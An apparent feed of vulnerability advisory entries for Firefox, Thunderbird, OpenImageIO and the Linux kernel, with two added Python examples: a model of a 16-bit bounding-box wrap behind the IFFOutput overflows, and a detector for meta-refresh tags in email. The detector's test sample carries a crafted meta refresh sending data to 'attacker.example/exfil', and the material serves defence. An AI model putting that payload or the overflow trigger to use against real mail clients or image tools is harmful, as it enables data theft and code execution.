All posts published by ISHACK AI BOT
-
Ubuntu: (Multiple Advisories) (CVE-2022-34470): Firefox vulnerabilities
Severity: 10
CVSS: AV:N/AC:L/Au:N/C:C/I:C/A:C
Published: 12/22/2022 | Created: 03/29/2023 | Added: 03/22/2023 | Modified: 01/28/2025
Description: Session history navigations may have led to a use-after-free and potentially exploitable crash. This vulnerability affects Firefox < 102, Firefox ESR < 91.11, Thunderbird < 102, and Thunderbird < 91.11.
Solution(s): ubuntu-upgrade-firefox, ubuntu-upgrade-thunderbird
References: https://attackerkb.com/topics/cve-2022-34470, CVE-2022-34470, USN-5504-1, USN-5512-1
-
Ubuntu: (CVE-2022-36314): thunderbird vulnerability
Severity: 5
CVSS: AV:L/AC:M/Au:N/C:N/I:C/A:N
Published: 12/22/2022 | Created: 11/21/2024 | Added: 11/19/2024 | Modified: 01/28/2025
Description: When opening a Windows shortcut from the local filesystem, an attacker could supply a remote path that would lead to unexpected network requests from the operating system. This bug only affects Firefox for Windows. Other operating systems are unaffected. This vulnerability affects Firefox ESR < 102.1, Firefox < 103, and Thunderbird < 102.1.
Solution(s): ubuntu-upgrade-thunderbird
References: https://attackerkb.com/topics/cve-2022-36314, CVE-2022-36314, https://www.cve.org/CVERecord?id=CVE-2022-36314, https://www.mozilla.org/en-US/security/advisories/mfsa2022-30/#CVE-2022-36314
-
Debian: CVE-2022-43601: openimageio -- security update
Severity: 9
CVSS: AV:N/AC:M/Au:N/C:C/I:C/A:C
Published: 12/22/2022 | Created: 05/05/2023 | Added: 04/06/2023 | Modified: 01/28/2025
Description: Multiple code execution vulnerabilities exist in the IFFOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput object can lead to a heap buffer overflow. An attacker can provide malicious input to trigger these vulnerabilities. This vulnerability arises when the `ymax` variable is set to 0xFFFF and `m_spec.format` is `TypeDesc::UINT16`.
Solution(s): debian-upgrade-openimageio
References: https://attackerkb.com/topics/cve-2022-43601, CVE-2022-43601, DLA-3382-1
-
Ubuntu: (Multiple Advisories) (CVE-2022-34468): Firefox vulnerabilities
Severity: 9
CVSS: AV:N/AC:M/Au:N/C:C/I:C/A:C
Published: 12/22/2022 | Created: 03/29/2023 | Added: 03/22/2023 | Modified: 01/28/2025
Description: An iframe that was not permitted to run scripts could do so if the user clicked on a `javascript:` link. This vulnerability affects Firefox < 102, Firefox ESR < 91.11, Thunderbird < 102, and Thunderbird < 91.11.
Solution(s): ubuntu-upgrade-firefox, ubuntu-upgrade-thunderbird
References: https://attackerkb.com/topics/cve-2022-34468, CVE-2022-34468, USN-5504-1, USN-5512-1
-
Debian: CVE-2022-4378: linux -- security update
Severity: 7
CVSS: AV:L/AC:L/Au:S/C:C/I:C/A:C
Published: 12/22/2022 | Created: 12/23/2022 | Added: 12/22/2022 | Modified: 01/30/2025
Description: A stack overflow flaw was found in the Linux kernel's SYSCTL subsystem in how a user changes certain kernel parameters and variables. This flaw allows a local user to crash or potentially escalate their privileges on the system.
Solution(s): debian-upgrade-linux
References: https://attackerkb.com/topics/cve-2022-4378, CVE-2022-4378, DLA-3244-1, DLA-3245-1
-
Debian: CVE-2022-4662: linux -- security update
Severity: 5
CVSS: AV:L/AC:L/Au:S/C:N/I:N/A:C
Published: 12/22/2022 | Created: 07/31/2024 | Added: 07/30/2024 | Modified: 01/28/2025
Description: An incorrect access control flaw was found in the Linux kernel USB core subsystem in the way a user attaches a USB device. A local user could use this flaw to crash the system.
Solution(s): debian-upgrade-linux
References: https://attackerkb.com/topics/cve-2022-4662, CVE-2022-4662
-
Debian: CVE-2022-43593: openimageio -- security update
Severity: 7
CVSS: AV:N/AC:M/Au:N/C:N/I:N/A:C
Published: 12/22/2022 | Created: 05/05/2023 | Added: 04/06/2023 | Modified: 01/28/2025
Description: A denial of service vulnerability exists in the DPXOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput object can lead to a null pointer dereference. An attacker can provide malicious input to trigger this vulnerability.
Solution(s): debian-upgrade-openimageio
References: https://attackerkb.com/topics/cve-2022-43593, CVE-2022-43593, DLA-3382-1
-
Alpine Linux: CVE-2022-34480: Access of Uninitialized Pointer
Severity: 9
CVSS: AV:N/AC:M/Au:N/C:C/I:C/A:C
Published: 12/22/2022 | Created: 08/23/2024 | Added: 08/22/2024 | Modified: 10/02/2024
Description: Within the `lg_init()` function, if several allocations succeed but then one fails, an uninitialized pointer would have been freed despite never being allocated. This vulnerability affects Firefox < 102.
Solution(s): alpine-linux-upgrade-firefox
References: https://attackerkb.com/topics/cve-2022-34480, CVE-2022-34480, https://security.alpinelinux.org/vuln/CVE-2022-34480
-
Debian: CVE-2022-43598: openimageio -- security update
Severity: 9
CVSS: AV:N/AC:M/Au:N/C:C/I:C/A:C
Published: 12/22/2022 | Created: 05/05/2023 | Added: 04/06/2023 | Modified: 01/28/2025
Description: Multiple memory corruption vulnerabilities exist in the IFFOutput alignment padding functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput object can lead to arbitrary code execution. An attacker can provide malicious input to trigger these vulnerabilities. This vulnerability arises when `m_spec.format` is `TypeDesc::UINT16`.
Solution(s): debian-upgrade-openimageio
References: https://attackerkb.com/topics/cve-2022-43598, CVE-2022-43598, DLA-3382-1
-
Debian: CVE-2022-43603: openimageio -- security update
Severity: 7
CVSS: AV:N/AC:M/Au:N/C:N/I:N/A:C
Published: 12/22/2022 | Created: 05/05/2023 | Added: 04/06/2023 | Modified: 01/28/2025
Description: A denial of service vulnerability exists in the ZfileOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput object can lead to denial of service. An attacker can provide a malicious file to trigger this vulnerability.
Solution(s): debian-upgrade-openimageio
References: https://attackerkb.com/topics/cve-2022-43603, CVE-2022-43603, DLA-3382-1
-
Debian: CVE-2022-43602: openimageio -- security update
Severity: 9
CVSS: AV:N/AC:M/Au:N/C:C/I:C/A:C
Published: 12/22/2022 | Created: 05/05/2023 | Added: 04/06/2023 | Modified: 01/28/2025
Description: Multiple code execution vulnerabilities exist in the IFFOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput object can lead to a heap buffer overflow. An attacker can provide malicious input to trigger these vulnerabilities. This vulnerability arises when the `ymax` variable is set to 0xFFFF and `m_spec.format` is `TypeDesc::UINT8`.
Solution(s): debian-upgrade-openimageio
References: https://attackerkb.com/topics/cve-2022-43602, CVE-2022-43602, DLA-3382-1
-
Alpine Linux: CVE-2022-40898: Vulnerability in Py3-wheel
Severity: 8
CVSS: AV:N/AC:L/Au:N/C:N/I:N/A:C
Published: 12/22/2022 | Created: 03/22/2024 | Added: 03/21/2024 | Modified: 03/22/2024
Description: An issue discovered in Python Packaging Authority (PyPA) Wheel 0.37.1 and earlier allows remote attackers to cause a denial of service via attacker-controlled input to the wheel CLI.
Solution(s): alpine-linux-upgrade-py3-wheel
References: https://attackerkb.com/topics/cve-2022-40898, CVE-2022-40898, https://security.alpinelinux.org/vuln/CVE-2022-40898
-
Debian: CVE-2022-46877: firefox-esr, thunderbird -- security update
Severity: 4
CVSS: AV:N/AC:M/Au:N/C:N/I:P/A:N
Published: 12/22/2022 | Created: 01/20/2023 | Added: 01/20/2023 | Modified: 01/28/2025
Description: By confusing the browser, the fullscreen notification could have been delayed or suppressed, resulting in potential user confusion or spoofing attacks. This vulnerability affects Firefox < 108.
Solution(s): debian-upgrade-firefox-esr, debian-upgrade-thunderbird
References: https://attackerkb.com/topics/cve-2022-46877, CVE-2022-46877, DLA-3275-1, DSA-5322, DSA-5322-1, DSA-5355
-
Debian: CVE-2022-46871: firefox-esr, libusrsctp, thunderbird -- security update
Severity: 9
CVSS: AV:N/AC:M/Au:N/C:C/I:C/A:C
Published: 12/22/2022 | Created: 01/20/2023 | Added: 01/20/2023 | Modified: 01/28/2025
Description: An out-of-date library (libusrsctp) contained vulnerabilities that could potentially be exploited. This vulnerability affects Firefox < 108.
Solution(s): debian-upgrade-firefox-esr, debian-upgrade-libusrsctp, debian-upgrade-thunderbird
References: https://attackerkb.com/topics/cve-2022-46871, CVE-2022-46871, DLA-3275-1, DSA-5322, DSA-5322-1, DSA-5355
-
Debian: CVE-2022-43600: openimageio -- security update
Severity: 9
CVSS: AV:N/AC:M/Au:N/C:C/I:C/A:C
Published: 12/22/2022 | Created: 05/05/2023 | Added: 04/06/2023 | Modified: 01/28/2025
Description: Multiple code execution vulnerabilities exist in the IFFOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput object can lead to a heap buffer overflow. An attacker can provide malicious input to trigger these vulnerabilities. This vulnerability arises when the `xmax` variable is set to 0xFFFF and `m_spec.format` is `TypeDesc::UINT16`.
Solution(s): debian-upgrade-openimageio
References: https://attackerkb.com/topics/cve-2022-43600, CVE-2022-43600, DLA-3382-1
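Added example, not OpenImageIO code and not part of any advisory above. The three IFFOutput::close() entries on this page (CVE-2022-43600, CVE-2022-43601, CVE-2022-43602) all hinge on a bounding-box field set to 0xFFFF combined with a 1- or 2-byte channel format. The snippet models one way such a field can drive an undersized buffer: an inclusive extent of 0x10000 computed in 16-bit arithmetic wraps to 0, so a writer that trusts the wrapped value sizes a buffer for zero scanlines while the pixel data still covers 65536 of them. Whether this is OpenImageIO's exact code path is not stated on the page; the field names, the 16-bit wrap model, the per-format byte widths and the MAX_PIXEL_BYTES cap are assumptions made for this example. The checked variant is the pre-validation an ingest pipeline or fuzzing harness can apply before handing a header to a decoder.

```python
# Added illustration, not OpenImageIO code. Models how an IFF-style bounding box
# stored in 16-bit fields can drive buffer sizing. Field names, the 16-bit wrap
# model and MAX_PIXEL_BYTES are assumptions made for this example.
from dataclasses import dataclass
from typing import Optional

U16_MAX = 0xFFFF
MAX_PIXEL_BYTES = 1 << 31            # assumed hard cap for a single pixel buffer

# The two channel formats named in the advisories and their byte widths.
BYTES_PER_CHANNEL = {"UINT8": 1, "UINT16": 2}


@dataclass(frozen=True)
class BBox16:
    """Inclusive bounding box as it would be read from 16-bit header fields."""
    xmin: int
    xmax: int
    ymin: int
    ymax: int


def naive_extent_u16(lo: int, hi: int) -> int:
    """Extent computed in 16-bit arithmetic: hi - lo + 1 truncated to a uint16.
    For lo=0, hi=0xFFFF the true extent is 0x10000, which wraps to 0."""
    return (hi - lo + 1) & U16_MAX


def naive_pixel_bytes(box: BBox16, nchannels: int, fmt: str) -> int:
    """Buffer size a writer would allocate if it trusted the wrapped extents.
    A wrapped height of 0 yields a 0-byte buffer while the pixel data still
    covers 0x10000 scanlines: the shape of a heap buffer overflow."""
    width = naive_extent_u16(box.xmin, box.xmax)
    height = naive_extent_u16(box.ymin, box.ymax)
    return width * height * nchannels * BYTES_PER_CHANNEL[fmt]


def checked_pixel_bytes(box: BBox16, nchannels: int, fmt: str) -> Optional[int]:
    """Validate the spec before sizing anything. Returns the exact byte count,
    or None when the header is inconsistent, unrepresentable, or too large."""
    if fmt not in BYTES_PER_CHANNEL or nchannels <= 0:
        return None
    if not (0 <= box.xmin <= box.xmax <= U16_MAX):
        return None
    if not (0 <= box.ymin <= box.ymax <= U16_MAX):
        return None
    width = box.xmax - box.xmin + 1
    height = box.ymax - box.ymin + 1
    # An extent of 0x10000 cannot be stored back into a 16-bit field, so any
    # later code that re-reads the field would disagree with this computation.
    if width > U16_MAX or height > U16_MAX:
        return None
    total = width * height * nchannels * BYTES_PER_CHANNEL[fmt]
    if total > MAX_PIXEL_BYTES:
        return None
    return total


if __name__ == "__main__":
    hostile = BBox16(xmin=0, xmax=15, ymin=0, ymax=0xFFFF)   # constructed header
    sane = BBox16(xmin=0, xmax=15, ymin=0, ymax=15)
    print("naive bytes for hostile header:", naive_pixel_bytes(hostile, 3, "UINT16"))
    print("checked bytes for hostile header:", checked_pixel_bytes(hostile, 3, "UINT16"))
    print("checked bytes for sane header:", checked_pixel_bytes(sane, 3, "UINT16"))
```

The check rejects the header rather than clamping it: a clamped dimension would silently disagree with the scanline count the rest of the file implies, which is exactly the mismatch the overflow depends on.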
-
Debian: CVE-2022-43597: openimageio -- security update
Severity: 9
CVSS: AV:N/AC:M/Au:N/C:C/I:C/A:C
Published: 12/22/2022 | Created: 05/05/2023 | Added: 04/06/2023 | Modified: 01/28/2025
Description: Multiple memory corruption vulnerabilities exist in the IFFOutput alignment padding functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput object can lead to arbitrary code execution. An attacker can provide malicious input to trigger these vulnerabilities. This vulnerability arises when `m_spec.format` is `TypeDesc::UINT8`.
Solution(s): debian-upgrade-openimageio
References: https://attackerkb.com/topics/cve-2022-43597, CVE-2022-43597, DLA-3382-1
-
Debian: CVE-2022-43594: openimageio -- security update
Severity: 7
CVSS: AV:N/AC:M/Au:N/C:N/I:N/A:C
Published: 12/22/2022 | Created: 05/05/2023 | Added: 04/06/2023 | Modified: 01/28/2025
Description: Multiple denial of service vulnerabilities exist in the image output closing functionality of OpenImageIO Project OpenImageIO v2.4.4.2. Specially crafted ImageOutput objects can lead to multiple null pointer dereferences. An attacker can provide multiple malicious inputs to trigger these vulnerabilities. This vulnerability applies to writing .bmp files.
Solution(s): debian-upgrade-openimageio
References: https://attackerkb.com/topics/cve-2022-43594, CVE-2022-43594, DLA-3382-1
-
Debian: CVE-2022-43592: openimageio -- security update
Severity: 7
CVSS: AV:N/AC:M/Au:N/C:C/I:N/A:N
Published: 12/22/2022 | Created: 05/05/2023 | Added: 04/06/2023 | Modified: 01/28/2025
Description: An information disclosure vulnerability exists in the DPXOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput object can lead to leaked heap data. An attacker can provide malicious input to trigger this vulnerability.
Solution(s): debian-upgrade-openimageio
References: https://attackerkb.com/topics/cve-2022-43592, CVE-2022-43592, DLA-3382-1
-
Debian: CVE-2022-3033: thunderbird -- security update
Severity: 9
CVSS: AV:N/AC:M/Au:N/C:C/I:C/A:N
Published: 12/22/2022 | Created: 07/31/2024 | Added: 07/30/2024 | Modified: 01/30/2025
Description: If a Thunderbird user replied to a crafted HTML email containing a `meta` tag, with the `meta` tag having the `http-equiv="refresh"` attribute, and the content attribute specifying a URL, then Thunderbird started a network request to that URL, regardless of the configuration to block remote content. In combination with certain other HTML elements and attributes in the email, it was possible to execute JavaScript code included in the message in the context of the message compose document. The JavaScript code was able to perform actions including, but probably not limited to, reading and modifying the contents of the message compose document, including the quoted original message, which could potentially contain the decrypted plaintext of encrypted data in the crafted email. The contents could then be transmitted to the network, either to the URL specified in the META refresh tag or to a different URL, as the JavaScript code could modify the URL specified in the document. This bug doesn't affect users who have changed the default Message Body display setting to 'simple html' or 'plain text'. This vulnerability affects Thunderbird < 102.2.1 and Thunderbird < 91.13.1.
Solution(s): debian-upgrade-thunderbird
References: https://attackerkb.com/topics/cve-2022-3033, CVE-2022-3033
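Added example, not Thunderbird code and not part of the advisory above. The CVE-2022-3033 description turns on a single HTML construct, a `meta` tag with `http-equiv="refresh"` whose content attribute names a URL, which caused a network request when the message was quoted into a reply. The scanner below finds that construct in a message body and reports the URL each one would reach, which is the check a mail gateway or a triage script can run over stored mail to find messages carrying the trigger. It uses only the standard library; the sample bodies are constructed for this example and are not captured messages. It reproduces the detection, not Thunderbird's rendering or blocking behaviour.

```python
# Added example, not Thunderbird code: scan an HTML message body for
# <meta http-equiv="refresh"> and report the URL each one would cause a
# client to fetch. Sample bodies below are constructed for this example.
import re
from html.parser import HTMLParser
from typing import List, Optional

# "content" is "<seconds>[; url=<target>]"; clients are lenient about spacing,
# quoting and case, so the pattern is deliberately permissive.
_URL_IN_CONTENT = re.compile(r"url\s*=\s*['\"]?([^'\"\s;]+)", re.IGNORECASE)


class MetaRefreshFinder(HTMLParser):
    """Collect the target URL of every meta refresh in a document."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.targets: List[Optional[str]] = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names; values may be None.
        # Self-closing <meta ... /> also arrives here via handle_startendtag.
        if tag != "meta":
            return
        a = {name: (value or "") for name, value in attrs}
        if a.get("http-equiv", "").strip().lower() != "refresh":
            return
        m = _URL_IN_CONTENT.search(a.get("content", ""))
        # A refresh with no url reloads the document itself; record it as None.
        self.targets.append(m.group(1) if m else None)


def find_meta_refresh(html: str) -> List[Optional[str]]:
    """Return the refresh targets in document order (None for self-reloads)."""
    parser = MetaRefreshFinder()
    parser.feed(html)
    parser.close()
    return parser.targets


def remote_refresh_targets(html: str) -> List[str]:
    """Only the targets that would reach the network (http/https schemes)."""
    return [t for t in find_meta_refresh(html)
            if t is not None and t.lower().startswith(("http://", "https://"))]


# Constructed samples, not captured messages.
SAMPLE_MALICIOUS = """<html><head>
<META HTTP-EQUIV="Refresh" CONTENT="0; URL='https://attacker.example/exfil?m=1'">
</head><body><p>Quarterly report attached.</p></body></html>"""

SAMPLE_BENIGN = """<html><head><meta charset="utf-8">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head><body><p>Hi, see you Tuesday.</p></body></html>"""

if __name__ == "__main__":
    for name, body in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(name, "->", remote_refresh_targets(body))
```

The upper-case tag and attribute names in the constructed sample are deliberate: a filter that only matches the lower-case spelling misses what a lenient HTML parser still honours, so the finder normalises case before comparing.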
-
Debian: CVE-2022-41639: openimageio -- security update
Severity: 10
CVSS: AV:N/AC:L/Au:N/C:C/I:C/A:C
Published: 12/22/2022 | Created: 05/05/2023 | Added: 04/06/2023 | Modified: 01/28/2025
Description: A heap-based buffer overflow vulnerability exists in the tile decoding code of the TIFF image parser in OpenImageIO master-branch-9aeece7a and v2.3.19.0. A specially crafted TIFF file can lead to out-of-bounds memory corruption, which can result in arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.
Solution(s): debian-upgrade-openimageio
References: https://attackerkb.com/topics/cve-2022-41639, CVE-2022-41639, DLA-3382-1
-
Debian: CVE-2022-43595: openimageio -- security update
Severity: 7
CVSS: AV:N/AC:M/Au:N/C:N/I:N/A:C
Published: 12/22/2022 | Created: 05/05/2023 | Added: 04/06/2023 | Modified: 01/28/2025
Description: Multiple denial of service vulnerabilities exist in the image output closing functionality of OpenImageIO Project OpenImageIO v2.4.4.2. Specially crafted ImageOutput objects can lead to multiple null pointer dereferences. An attacker can provide multiple malicious inputs to trigger these vulnerabilities. This vulnerability applies to writing .fits files.
Solution(s): debian-upgrade-openimageio
References: https://attackerkb.com/topics/cve-2022-43595, CVE-2022-43595, DLA-3382-1
-
Alpine Linux: CVE-2022-22745: Vulnerability in Multiple Components
Severity: 7
CVSS: AV:N/AC:M/Au:N/C:C/I:N/A:N
Published: 12/22/2022 | Created: 08/23/2024 | Added: 08/22/2024 | Modified: 10/02/2024
Description: `securitypolicyviolation` events could have leaked cross-origin information for frame-ancestors violations. This vulnerability affects Firefox ESR < 91.5, Firefox < 96, and Thunderbird < 91.5.
Solution(s): alpine-linux-upgrade-firefox-esr, alpine-linux-upgrade-firefox, alpine-linux-upgrade-thunderbird
References: https://attackerkb.com/topics/cve-2022-22745, CVE-2022-22745, https://security.alpinelinux.org/vuln/CVE-2022-22745
-
Debian: CVE-2022-43596: openimageio -- security update
Severity: 7
CVSS: AV:N/AC:M/Au:N/C:C/I:N/A:N
Published: 12/22/2022 | Created: 05/05/2023 | Added: 04/06/2023 | Modified: 01/28/2025
Description: An information disclosure vulnerability exists in the IFFOutput channel interleaving functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput object can lead to leaked heap data. An attacker can provide malicious input to trigger this vulnerability.
Solution(s): debian-upgrade-openimageio
References: https://attackerkb.com/topics/cve-2022-43596, CVE-2022-43596, DLA-3382-1
-
Alpine Linux: CVE-2022-36318: Race Condition
Severity: 5
CVSS: AV:N/AC:H/Au:N/C:C/I:N/A:N
Published: 12/22/2022 | Created: 08/23/2024 | Added: 08/22/2024 | Modified: 10/02/2024
Description: When visiting directory listings for `chrome://` URLs as source text, some parameters were reflected. This vulnerability affects Firefox ESR < 102.1, Firefox ESR < 91.12, Firefox < 103, Thunderbird < 102.1, and Thunderbird < 91.12.
Solution(s): alpine-linux-upgrade-firefox-esr, alpine-linux-upgrade-firefox
References: https://attackerkb.com/topics/cve-2022-36318, CVE-2022-36318, https://security.alpinelinux.org/vuln/CVE-2022-36318
-
Gentoo Linux: CVE-2022-46880: Mozilla Firefox: Multiple Vulnerabilities
Severity: 7
CVSS: AV:N/AC:M/Au:N/C:N/I:N/A:C
Published: 12/22/2022 | Created: 05/05/2023 | Added: 05/04/2023 | Modified: 01/28/2025
Description: A missing check related to tex units could have led to a use-after-free and potentially exploitable crash. Note: This advisory was added on December 13th, 2022 after we better understood the impact of the issue. The fix was included in the original release of Firefox 105. This vulnerability affects Firefox ESR < 102.6, Firefox < 105, and Thunderbird < 102.6.
Solution(s): gentoo-linux-upgrade-mail-client-thunderbird, gentoo-linux-upgrade-mail-client-thunderbird-bin, gentoo-linux-upgrade-www-client-firefox, gentoo-linux-upgrade-www-client-firefox-bin
References: https://attackerkb.com/topics/cve-2022-46880, CVE-2022-46880, 202305-06, 202305-13